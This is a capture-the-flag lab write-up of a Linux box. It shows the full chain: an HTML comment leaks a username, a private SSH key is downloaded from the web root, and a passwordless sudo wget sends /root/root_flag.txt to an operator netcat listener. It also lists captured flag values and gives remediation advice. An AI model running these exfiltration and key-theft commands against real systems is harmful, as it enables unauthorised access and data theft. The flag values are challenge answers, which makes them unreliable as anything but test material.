Case file

SSH key from sitemap .ssh and sudo wget root exfil

Foundations Linux engagement: HTML comment leaked user jessie; /sitemap/.ssh/id_rsa enabled key auth; sudo NOPASSWD wget posted /root/root_flag.txt to the operator listener.

Foundations18 minSSH · Web Enumeration · Privilege Escalation · GTFOBins
  • Nmap showed 22/80; source comment named jessie; gobuster found /sitemap/.ssh/id_rsa; SSH as jessie; sudo wget exfiltrated root_flag.txt.

  • Recovered jessie from HTML comment; downloaded id_rsa from /sitemap/.ssh/; authenticated.

  • Confirmed NOPASSWD wget; posted /root/root_flag.txt to operator nc listener.

01

Engagement summary

Nmap showed 22/80; source comment named jessie; gobuster found /sitemap/.ssh/id_rsa; SSH as jessie; sudo wget exfiltrated root_flag.txt.

WGEL presented SSH and HTTP. The default-style site source contained an HTML comment naming jessie. Directory brute force uncovered /sitemap/, and further enum revealed /.ssh/id_rsa served over HTTP — a private key in the web root. chmod 600 and ssh -i id_rsa jessie@TARGET yielded a shell; user_flag.txt lived under Jessie’s Documents. sudo -l showed (root) NOPASSWD: /usr/bin/wget. Per GTFOBins, wget can POST a local file to an attacker listener. nc -nlvp on the operator host plus sudo wget --post-file=/root/root_flag.txt http://OPERATOR:PORT returned the root artifact in the HTTP body. Chain: username hint + world-readable SSH key + passwordless wget as root.

Business impact

Private keys in web-accessible paths are immediate account takeover. NOPASSWD wget as root is a built-in exfiltration and file-write primitive. Treat document roots as hostile; never grant unconstrained network utilities via sudo.

02

Web enum to Jessie SSH

Recovered jessie from HTML comment; downloaded id_rsa from /sitemap/.ssh/; authenticated.

OPERATOR · ENUM / SSH

savvy@lab:~$ nmap -sV 10.10.10.10

22/tcp open ssh 80/tcp open http

savvy@lab:~$ curl -s http://10.10.10.10/ | grep -i jessie

<!-- jessie -->

savvy@lab:~$ gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt

/sitemap → /.ssh/id_rsa

savvy@lab:~$ curl -s http://10.10.10.10/sitemap/.ssh/id_rsa -o id_rsa && chmod 600 id_rsa

savvy@lab:~$ ssh -i id_rsa jessie@10.10.10.10

jessie@10.10.10.10: ******** savvy@lab:~$ cat ~/Documents/user_flag.txt

057c67131c3d5e42dd5cd3075b198ff6

03

sudo wget POST of root_flag.txt

Confirmed NOPASSWD wget; posted /root/root_flag.txt to operator nc listener.

OPERATOR · PRIVESC

savvy@lab:~$ sudo -l

(root) NOPASSWD: /usr/bin/wget

savvy@lab:~$ nc -nlvp 9000

savvy@lab:~$ sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.0.54:9000

POST body → b1b968b37519ad1daa6408188649263d

Remediation

Block serving of .ssh and backup paths from the web root. Use deploy keys with least privilege, never user private keys on the document root. Remove NOPASSWD for wget/curl/python; if file transfer as root is required, wrap a narrow script that cannot choose arbitrary URLs or local paths.